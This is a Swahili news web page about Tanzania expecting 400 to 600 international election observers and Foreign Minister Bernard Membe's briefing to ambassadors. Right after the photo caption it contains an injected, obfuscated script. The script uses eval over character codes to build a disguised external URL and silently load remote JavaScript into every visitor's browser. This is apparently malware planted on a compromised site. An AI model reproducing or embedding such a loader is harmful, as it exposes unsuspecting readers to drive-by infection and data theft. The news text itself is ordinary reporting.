<p>Waziri wa Mambo ya Nje na Ushirikiano wa Kimataifa, Bernard Membe</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
TANZANIA inatarajia kupokea waangalizi wa kimataifa kati ya 400 hadi 600 kutoka nchi mbalimbali duniani wanaokuja kufuatilia uchaguzi mkuu utakaofanyika Oktoba 25, mwaka huu.
Waangalizi hao, wametakiwa wawapo nchini wafuate sheria za nchi pamoja na kuhakikisha hawafungamani na upande wowote.
Aidha imeelezwa kuwa Serikali imepokea misaada wa Sh bilioni 265 kwa ajili ya uchaguzi wa mwaka huu ambazo zimetolewa na wafadhili kupitia Shirika la Umoja wa Mataifa linaloshughulikia Maendeleo (UNDP) na kupelekwa kwa Tume ya Taifa ya Uchaguzi (NEC).
Akizungumza na mabalozi wanaowakilisha nchi zao hapa nchini jana, Waziri wa Mambo ya Nje, Bernard Membe, alisema Serikali imejipanga kuhakikisha amani inakuwepo wakati wote wa kuelekea uchaguzi na pia siku yenyewe ya uchaguzi Oktoba 25 mwaka huu.
Membe alisema kuna waangalizi kutoka Amerika ambao idadi yao ni 100, umoja wa nchi za Ulaya waangalizi wasiopungua 120, Uingereza 50 na Norway 12 lakini akasema wengi watatoka katika Jumuiya ya Maendeleo ya Nchi za Kusini mwa Afrika (SADC).
Aidha Membe aliwakumbusha mabalozi hao ili kuwaeleza waangalizi watakaokuja kutoka nchi zao nini wanatakiwa kufanya ili kuhakikisha amani inakuwepo wakati wote.
Waziri huyo aliwaambia pia mabalozi kwamba kuna kitabu maalum cha muongozo kimetolewa na Tume na hivyo wasome majukumu ya waangalizi kutoka ndani na nje ya nchi pamoja na sheria zinazotumika katika uchaguzi.
âSheria zinaeleza wazi kwamba huji hapa nchini kama mkurugenzi, kueleza nini kifanyike katika uchaguzi huu, unakuja wewe na macho yako kuangalia, na pale unapoona mambo yanakwenda ovyo una ruhusa ya kuandika na kuifikishia tume, wao watachukua hatua,â alisema Membe.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments